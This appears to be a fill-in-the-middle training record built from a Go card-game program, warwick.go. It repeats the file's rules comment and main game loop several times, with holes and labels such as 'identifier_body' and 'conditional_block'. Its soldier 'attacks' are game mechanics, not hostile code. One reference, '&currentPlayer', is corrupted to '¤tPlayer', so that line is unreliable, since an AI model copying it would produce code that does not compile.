Each gives you additional powers. Details are below. There are 2 of each building in the deck.
Soldiers:
You can also recruit a Soldier card, but only up to the level of your current Military building. Like a building, you must
discard as many cards as the level of the soldier, unless you have a farm, which reduces the cost of recruiting Soldiers.
Soldiers can be used to attack the opponent. By discarding a soldier, you may take a card of equal value from your opponent.
If they have a defensive building, you must take the defensive building, and you may only take it if it is of equal or
lesser value.
Additionally, soldiers may be used for defense. They subtract their value from the value of the attacking soldier. If they
have a greater value, both attacking and defending soldiers are discarded. This is optional, you may choose to save your
soldier for attack.
Like buildings, soldiers may be upgraded, but not above the level of the military building.
Storage:
There are 4 spots on the board which can be used for storage, but only if you build the Storage building. You may store as many
cards as the value of the storage building. Cards put into Storage may only be built, they may not be discarded or trashed.
When you build a storage building, the storage slots will be filled, but if you build one of those cards, you can use that
spot to put a card from your hand. If you upgrade your storage, you may be able to fill empty spots from the deck. If the
opponents soldier attacks you and takes your Storage building, he also gets everything you have in storage!
Storage reconsidered:
Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
Storage reconsidered: Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
re2considered: 1: store card on table, 2: store 2nd card, 3: can move card back into hand, 4: fill any open storage spots at the time you build this card
re3considered: with each level, you open a spot that must be immediately filled from the draw, discard or hand
re4considered: 1: open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func store(storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() | {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players[0]
}
// we keep track of messages to send to the Human player
if opponent.Human {
players[0].State = fmt.Sprintf("Turn: %d\n", turnCount + 2)
}
// if we're coming back to this player and they already have 9 cards, it's time to stop
if currentPlayer.Tableau.Fill == 9 {
gameOver = true
break;
// there is an error here in that if player 1 goes out first, player 0 doesn't get another play
}
// turn order:
// 1. Build
// 2. Attack
// 3. Trash (with Market)
// 4. Draw up to 5 OR discard down to 5
// determine card to build, cost
// determine discards
// do build
// log(2, fmt.Sprintf("Player %d hand: %s", id, currentPlayer.Hand))
// log(2, fmt.Sprintf("Player %d Tableau: %s", id, currentPlayer.Tableau))
builds := 0
// we check it each time, since if you build the card, you get to use it immediately
for builds < (currentPlayer.Tableau.BuildBonus + 1) {
buildPos, cost, upgrade := currentPlayer.PlayerChooses(legalBuildFrom, phase)
var discards []player.Pos
if buildPos.From != player.NoCard {
log(1, fmt.Sprintf("Player %d builds %s for %d", id, currentPlayer.CardByPos(buildPos), cost))
if cost > 0 {
discards = currentPlayer.ChooseDiscards(buildPos, cost, phase)
if logLevel > 1 {
fmt.Println("Player", id, "discards:")
for _, pos := range discards {
fmt.Println(currentPlayer.CardByPos(pos))
}
}
}
kind := currentPlayer.CardByPos(buildPos).Kind
cardValue := currentPlayer.CardByPos(buildPos).Cost
currentPlayer.Build(buildPos, discards, &discardPile, upgrade)
// if it's storage, you get a chance to place a card
if kind == card.Storage {
store(cardValue, &stock, &discardPile, ¤tPlayer, phase);
}
log(2, fmt.Sprintf("currentPlayer %d has %d cards left", id, currentPlayer.Hand.Count))
builds++
} else {
break;
}
}
// When they don't build, and they have cards, check if they'd like to trash and redraw
if builds == 0 {
preResetCount := currentPlayer.Hand.Count
if (currentPlayer.Human && preResetCount > 0 && currentPlayer.HumanWantsRedraw()) || (currentPlayer.Hand.Count == currentPlayer.Hand.Limit) {
// if the computer player can't build, but they have a full hand, they will get stuck. Invoke the hand reset rule
currentPlayer.Hand.Reset()
stock.RandomPull(preResetCount, players[id].Hand)
fmt.Println("Player", id, "dumps their hand and redraws")
// if you recycle your hand, you don't get to do any builds, attacks, exchanges
continue;
}
}
// ------ Attack --------- //
steal := currentPlayer.ChooseAttack(opponent, phase) // steal is a card kind
if steal != -1 {
// log(1, fmt.Sprintf("Player %d uses %s and takes opponent's %s", id, currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal)))
if opponent.Human{
players[0].State += fmt.Sprintf("ALERT: Opponent used a %s to take your %s\n", currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal))
}
opponent.Tableau.RemoveTop(steal, currentPlayer.Hand)
// then loose your attack card
currentPlayer.Tableau.RemoveTop(card.Soldiers, &trash) // TODO: remove to trash, test if it works
}
// ------- TRASH --------- //
cardsTrashed := 0
// TrashBonus measures the amount of cards you can trash in order to draw a new one
if currentPlayer.Tableau.TrashBonus > 0 && currentPlayer.Hand.Count > 0 {
trashPoses := currentPlayer.ChooseTrash(phase)
cardsTrashed = currentPlayer.TrashCards(trashPoses, &trash)
}
// you must trash card to get the draw bonus under the current rules
if (currentPlayer.Tableau.DrawBonus > 0) && (cardsTrashed > 0) {
stock.RandomPull(currentPlayer.Tableau.DrawBonus, players[id].Hand)
log(1, fmt.Sprintf("Player %d bonus draws %d", id, currentPlayer.Tableau.DrawBonus))
}
// ------- DRAW --------- //
// see how many open spots there are in the hand. This may not run at all
currentPlayer.Draw(&discardPile, &stock, phase)
// ------- DISCARD --------- //
// TODO: allow player to choose discard
for currentPlayer.Hand.Count > currentPlayer.Hand.Limit {
fmt.Println("=================== Player", id, "has", currentPlayer.Hand.Count, "cards =================");
trashPos, _ := currentPlayer.LowestValueCard(phase, nil)
currentPlayer.Hand.RemoveCard(trashPos.Index, &trash)
}
// if a human is playing record the state to share with them at the beginning of their turn
// this assumes the human always goes first
if opponent.Human {
players[0].State += fmt.Sprintf("Opponent Tableau:\n%s\n", currentPlayer.Tableau)
players[0].State += fmt.Sprintf("Your Tableau:\n%s\n", opponent.Tableau)
}
}
fmt.Println("----END OF TURN----")
}
// determine the winner
if logLevel > 0 {
vp := make([]int, 2)
for id, currentPlayer := range players {
fmt.Println("Player", id, "Tableau: ", currentPlayer.Tableau)
vp[id] = currentPlayer.VictoryPoints()
}
fmt.Println("Player 0", vp[0], "-", vp[1], "Player 1")
if vp[0] == vp[1] {
fmt.Println("Tie game")
} else if vp[0] < vp[1] {
fmt.Println("Player 1 wins!")
} else {
fmt.Println("Player 0 wins!")
}
}
} | identifier_body | |
warwick.go | /*
You are building a medieval village. You win by having the most Victory Points (VP), which you get by building
particular buildings. You build by discarding cards. The game is over when one player has built one
of each kind of building (and his opponent gets one more turn), or when the deck runs out.
Buildings:
There are 9 different kinds of building: Civic, Defensive, School, Military, Manufacturing, Supply, Market, Farm and Storage.
Each gives you additional powers. Details are below. There are 2 of each building in the deck.
Soldiers:
You can also recruit a Soldier card, but only up to the level of your current Military building. Like a building, you must
discard as many cards as the level of the soldier, unless you have a farm, which reduces the cost of recruiting Soldiers.
Soldiers can be used to attack the opponent. By discarding a soldier, you may take a card of equal value from your opponent.
If they have a defensive building, you must take the defensive building, and you may only take it if it is of equal or
lesser value.
Additionally, soldiers may be used for defense. They subtract their value from the value of the attacking soldier. If they
have a greater value, both attacking and defending soldiers are discarded. This is optional, you may choose to save your
soldier for attack.
Like buildings, soldiers may be upgraded, but not above the level of the military building.
Storage:
There are 4 spots on the board which can be used for storage, but only if you build the Storage building. You may store as many
cards as the value of the storage building. Cards put into Storage may only be built, they may not be discarded or trashed.
When you build a storage building, the storage slots will be filled, but if you build one of those cards, you can use that
spot to put a card from your hand. If you upgrade your storage, you may be able to fill empty spots from the deck. If the
opponents soldier attacks you and takes your Storage building, he also gets everything you have in storage!
Storage reconsidered:
Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
Storage reconsidered: Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
re2considered: 1: store card on table, 2: store 2nd card, 3: can move card back into hand, 4: fill any open storage spots at the time you build this card
re3considered: with each level, you open a spot that must be immediately filled from the draw, discard or hand
re4considered: 1: open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func store(storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players[0]
}
// we keep track of messages to send to the Human player
if opponent.Human {
players[0].State = fmt.Sprintf("Turn: %d\n", turnCount + 2)
}
// if we're coming back to this player and they already have 9 cards, it's time to stop
if currentPlayer.Tableau.Fill == 9 {
gameOver = true
break;
// there is an error here in that if player 1 goes out first, player 0 doesn't get another play
}
// turn order:
// 1. Build
// 2. Attack
// 3. Trash (with Market)
// 4. Draw up to 5 OR discard down to 5
// determine card to build, cost
// determine discards
// do build
// log(2, fmt.Sprintf("Player %d hand: %s", id, currentPlayer.Hand))
// log(2, fmt.Sprintf("Player %d Tableau: %s", id, currentPlayer.Tableau))
builds := 0
// we check it each time, since if you build the card, you get to use it immediately
for builds < (currentPlayer.Tableau.BuildBonus + 1) {
buildPos, cost, upgrade := currentPlayer.PlayerChooses(legalBuildFrom, phase)
var discards []player.Pos
if buildPos.From != player.NoCard {
log(1, fmt.Sprintf("Player %d builds %s for %d", id, currentPlayer.CardByPos(buildPos), cost))
if cost > 0 {
discards = currentPlayer.ChooseDiscards(buildPos, cost, phase)
if logLevel > 1 {
fmt.Println("Player", id, "discards:")
for _, pos := range discards {
fmt.Println(currentPlayer.CardByPos(pos))
}
}
}
kind := currentPlayer.CardByPos(buildPos).Kind
cardValue := currentPlayer.CardByPos(buildPos).Cost
currentPlayer.Build(buildPos, discards, &discardPile, upgrade)
// if it's storage, you get a chance to place a card
if kind == card.Storage {
store(cardValue, &stock, &discardPile, ¤tPlayer, phase);
}
log(2, fmt.Sprintf("currentPlayer %d has %d cards left", id, currentPlayer.Hand.Count))
builds++
} else {
break;
}
}
// When they don't build, and they have cards, check if they'd like to trash and redraw
if builds == 0 {
preResetCount := currentPlayer.Hand.Count
if (currentPlayer.Human && preResetCount > 0 && currentPlayer.HumanWantsRedraw()) || (currentPlayer.Hand.Count == currentPlayer.Hand.Limit) {
// if the computer player can't build, but they have a full hand, they will get stuck. Invoke the hand reset rule
currentPlayer.Hand.Reset()
stock.RandomPull(preResetCount, players[id].Hand)
fmt.Println("Player", id, "dumps their hand and redraws")
// if you recycle your hand, you don't get to do any builds, attacks, exchanges
continue;
}
}
// ------ Attack --------- //
steal := currentPlayer.ChooseAttack(opponent, phase) // steal is a card kind
if steal != -1 |
// ------- TRASH --------- //
cardsTrashed := 0
// TrashBonus measures the amount of cards you can trash in order to draw a new one
if currentPlayer.Tableau.TrashBonus > 0 && currentPlayer.Hand.Count > 0 {
trashPoses := currentPlayer.ChooseTrash(phase)
cardsTrashed = currentPlayer.TrashCards(trashPoses, &trash)
}
// you must trash card to get the draw bonus under the current rules
if (currentPlayer.Tableau.DrawBonus > 0) && (cardsTrashed > 0) {
stock.RandomPull(currentPlayer.Tableau.DrawBonus, players[id].Hand)
log(1, fmt.Sprintf("Player %d bonus draws %d", id, currentPlayer.Tableau.DrawBonus))
}
// ------- DRAW --------- //
// see how many open spots there are in the hand. This may not run at all
currentPlayer.Draw(&discardPile, &stock, phase)
// ------- DISCARD --------- //
// TODO: allow player to choose discard
for currentPlayer.Hand.Count > currentPlayer.Hand.Limit {
fmt.Println("=================== Player", id, "has", currentPlayer.Hand.Count, "cards =================");
trashPos, _ := currentPlayer.LowestValueCard(phase, nil)
currentPlayer.Hand.RemoveCard(trashPos.Index, &trash)
}
// if a human is playing record the state to share with them at the beginning of their turn
// this assumes the human always goes first
if opponent.Human {
players[0].State += fmt.Sprintf("Opponent Tableau:\n%s\n", currentPlayer.Tableau)
players[0].State += fmt.Sprintf("Your Tableau:\n%s\n", opponent.Tableau)
}
}
fmt.Println("----END OF TURN----")
}
// determine the winner
if logLevel > 0 {
vp := make([]int, 2)
for id, currentPlayer := range players {
fmt.Println("Player", id, "Tableau: ", currentPlayer.Tableau)
vp[id] = currentPlayer.VictoryPoints()
}
fmt.Println("Player 0", vp[0], "-", vp[1], "Player 1")
if vp[0] == vp[1] {
fmt.Println("Tie game")
} else if vp[0] < vp[1] {
fmt.Println("Player 1 wins!")
} else {
fmt.Println("Player 0 wins!")
}
}
} | {
// log(1, fmt.Sprintf("Player %d uses %s and takes opponent's %s", id, currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal)))
if opponent.Human{
players[0].State += fmt.Sprintf("ALERT: Opponent used a %s to take your %s\n", currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal))
}
opponent.Tableau.RemoveTop(steal, currentPlayer.Hand)
// then loose your attack card
currentPlayer.Tableau.RemoveTop(card.Soldiers, &trash) // TODO: remove to trash, test if it works
} | conditional_block |
warwick.go | /*
You are building a medieval village. You win by having the most Victory Points (VP), which you get by building
particular buildings. You build by discarding cards. The game is over when one player has built one
of each kind of building (and his opponent gets one more turn), or when the deck runs out.
Buildings:
There are 9 different kinds of building: Civic, Defensive, School, Military, Manufacturing, Supply, Market, Farm and Storage.
Each gives you additional powers. Details are below. There are 2 of each building in the deck.
Soldiers:
You can also recruit a Soldier card, but only up to the level of your current Military building. Like a building, you must
discard as many cards as the level of the soldier, unless you have a farm, which reduces the cost of recruiting Soldiers.
Soldiers can be used to attack the opponent. By discarding a soldier, you may take a card of equal value from your opponent.
If they have a defensive building, you must take the defensive building, and you may only take it if it is of equal or
lesser value.
Additionally, soldiers may be used for defense. They subtract their value from the value of the attacking soldier. If they
have a greater value, both attacking and defending soldiers are discarded. This is optional, you may choose to save your
soldier for attack.
Like buildings, soldiers may be upgraded, but not above the level of the military building.
Storage:
There are 4 spots on the board which can be used for storage, but only if you build the Storage building. You may store as many
cards as the value of the storage building. Cards put into Storage may only be built, they may not be discarded or trashed.
When you build a storage building, the storage slots will be filled, but if you build one of those cards, you can use that
spot to put a card from your hand. If you upgrade your storage, you may be able to fill empty spots from the deck. If the
opponents soldier attacks you and takes your Storage building, he also gets everything you have in storage!
Storage reconsidered:
Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
Storage reconsidered: Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
re2considered: 1: store card on table, 2: store 2nd card, 3: can move card back into hand, 4: fill any open storage spots at the time you build this card
re3considered: with each level, you open a spot that must be immediately filled from the draw, discard or hand
re4considered: 1: open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func | (storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
